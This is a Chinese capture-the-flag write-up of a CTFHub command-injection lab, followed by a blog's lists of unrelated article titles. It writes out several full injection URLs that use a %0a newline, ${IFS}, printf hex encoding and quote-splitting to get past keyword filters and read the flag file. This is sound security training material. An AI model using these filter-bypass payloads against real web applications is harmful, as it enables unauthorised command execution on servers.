打开靶机

查看页面信息

查看源码可以发现这一次过滤了很多东西，查看当前目录信息

查询到%0a为换行符，可以利用这个url编码进行命令注入，开始尝试

http://challenge-2a4584dabb18d320.sandbox.ctfhub.com:10080/?ip=127.0.0.1%0als#

查看flag_is_here文件夹内文件信息

challenge-2a4584dabb18d320.sandbox.ctfhub.com:10080/?ip=127.0.0.1%0Als<flag_is_here#

flag也被过滤了……

查看大佬的wp，可以使用16进制编码绕过

开始尝试

http://challenge-2a4584dabb18d320.sandbox.ctfhub.com:10080/?ip=127.0.0.1%0Als${IFS}$(printf${IFS}%22\x66\x6C\x61\x67\x5F\x69\x73\x5F\x68\x65\x72\x65%22)#

使用同样的方法查看文件信息

http://challenge-2a4584dabb18d320.sandbox.ctfhub.com:10080/?ip=127.0.0.1%0Aca%27%27t${IFS}$(printf${IFS}%22\x66\x6C\x61\x67\x5F\x69\x73\x5F\x68\x65\x72\x65\x2F\x66\x6C\x61\x67\x5F\x32\x31\x37\x38\x38\x33\x31\x31\x36\x38\x38\x36\x30\x31\x2E\x70\x68\x70%22)#

成功拿到flag

附上大佬文章链接

https://blog.csdn.net/bmth666/article/details/104836708

最新文章

1. .NET WEB程序员需要掌握的技能
2. Unity3D 搭建优雅的UI框架
3. C#中使用反射获取结构体实例
4. Web 开发中应用 HTML5 技术的10个实例教程
5. [DeviceOne开发]-地区选择
6. 基于boa服务器的web控制mini2440的GPIO口
7. Redis 集合操作
8. dedecms代码研究一
9. Hibernate 、Hql查询和Criteria查询
10. dede 标签
11. [CSS3] 学习笔记-背景与边框相关样式
12. poj2349，最小生成树！
13. Android智能手机中各种音频场景下的audio data path
14. 2554 ACM 杭电 数学
15. mybatis 学习总结笔记Day2
16. hdu-3671-tarjin/割点方案
17. jQuery对标签、类样式、值、文档、DOM对象的操作
18. ioctl函数详细说明（网络）
19. Nginx web服务优化 （一）
20. 20145322第一次JAVA实验报告

热门文章

1. easyui form提交时验证必填，打开时不显示必填提示
2. mysqldump: [ERROR] unknown variable 'database=test'.
3. 基于nacos注册中心的ribbon定制规则
4. 一文说通C#中的异步迭代器
5. jmeter的一些知识目录
6. Spark性能优化指南
7. 工具-Git与GitHub-分支管理（99.5.2）
8. matplotlib的学习15-次坐标轴
9. .net core 3.1 过滤器(Filter) 与中间件与AOP面向切面 与拦截器及其应用
10. 记录第一次使用Vivado——以全加器为例子